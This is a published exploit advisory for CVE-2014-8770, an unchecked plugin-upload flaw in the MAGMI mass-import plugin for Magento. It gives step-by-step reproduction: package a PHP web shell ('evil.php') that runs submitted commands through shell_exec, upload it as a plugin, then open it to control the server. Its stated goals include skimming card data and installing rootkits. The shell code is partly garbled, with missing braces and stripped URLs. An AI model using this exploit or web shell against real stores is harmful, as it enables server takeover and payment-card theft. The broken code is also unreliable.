Magento Server MAGMI Plugin 0.7.17a - Remote File Inclusion

Related Vulnerabilities: CVE-2014-8770  
Publish Date: 25 Oct 2014
                Exploit found date:  10/24/2014
Security Researcher name:  Parvinder Bhasin
Contact info:
twitter:  @parvinderb - scorpio

Currently tested version:
Magento version:  Magento CE - 1.8 older
MAGMI version: v0.7.17a older

Download software link:
Magento server:
MAGMI Plugin:

MAGMI (MAGento Mass Importer) suffers from File inclusion vulnerability
(RFI) which allows an attacker to upload essentially any PHP file (without
any sanity checks).  This PHP file could then be used to skim credit card
data, rewrite files, run remote commands, delete files..etc.  Essentially,
this gives attacker ability to execute remote commands on the vulnerable

Steps to reproduce:

1.  http://<a>/magmi/web/magmi.php
2.  Under upload new plugins:
click on "choose file"
MAGento plugins are basically php file zipped.  So create a php shell and
zip the file. ex: evil.php  ex: zip file:  After the file
has been uploaded, it will say:  Plugin packaged installed.

if (isset($_POST['command'])){
echo "<form action='evil.php' method='post'>
      <input type='text' name='command' value=''/>
      <input type='submit' value='execute'/>

    if(function_exists('shell_exec')) {
    $output = shell_exec("$command");
    echo "<pre>$output</pre>";
else {
  echo "<form action='evil.php' method='post'>
      <input type='text' name='command' value=''/>
      <input type='submit' value='execute'/>

3.  Your malicious evil.php file is extracted now.  All you then need to do
is just access the evil.php page from:
 At this point you could really have access to the entire system.  Download
any malware, install rootkits, skim credit card data ..etc.etc.